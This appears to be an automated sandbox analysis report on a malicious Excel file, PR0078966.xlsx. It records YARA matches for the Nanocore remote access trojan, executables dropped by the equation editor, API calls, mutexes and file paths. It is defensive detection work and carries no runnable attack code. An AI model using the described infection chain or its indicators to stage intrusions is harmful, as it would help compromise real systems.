      Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 7.2.RegSvcs.exe.d00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 7.2.RegSvcs.exe.24b1644.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nass[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Users\Public\vbc.exeCode function: 4_2_009325F2 NtQuerySystemInformation,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00930FEA NtQueryInformationProcess,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_009325BF NtQuerySystemInformation,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00930FC8 NtQueryInformationProcess,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0075144A NtQuerySystemInformation,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0075140F NtQuerySystemInformation,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D4C09
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D34C8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DB8A0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D5550
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D3150
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D3100
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D0A60
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D2678
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8750
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DCB38
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D2338
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D43F0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D6398
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D5050
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DE838
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D38D0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D70E0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D70F0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8108
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DC100
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8118
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8582
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8590
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D9246
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D0A52
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DEAC0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DBAF0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DF290
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D7B49
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D7B58
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8308
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DBB00
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D8318
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DCB29
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004DE3D8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D6388
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004D6383
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00512441
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511E08
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511488
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511AB8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00514114
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511479
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511A60
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511AA9
      Source: C:\Users\Public\vbc.exeCode function: 4_2_005127F0
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00511DF9
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00542418
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005438C8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0054B5C8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00548B38
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00543020
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005430E7
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_00549738
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005497FF
      Source: PR0078966.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: nass[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: blFUun.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.2370244781.0000000000D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.2180491793.0000000003791000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.2370794437.00000000034E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.2369932100.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.2370250131.0000000000D10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegSvcs.exe PID: 824, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 4.2.vbc.exe.389c238.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.34f1a55.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.34ed42c.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.d10000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.d10000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 4.2.vbc.exe.389c238.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.34e85f6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.34ed42c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.d14629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.RegSvcs.exe.d00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.d00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 7.2.RegSvcs.exe.24b1644.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.RegSvcs.exe.24b1644.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: nass[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: blFUun.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/34@40/2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00930D46 AdjustTokenPrivileges,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00930D0F AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_007510DA AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_007510A3 AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PR0078966.xlsxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f57d5a77-8670-45ef-b736-5f3a07b68725}
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\QpFtrzfZSkKuUEVQLSe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF279.tmpJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................&.............H.&.....(.P.....................0.......0.......................................................................
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
      Source: vbc.exe, 00000004.00000002.2180262116.0000000002791000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
      Source: PR0078966.xlsxVirustotal: Detection: 28%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
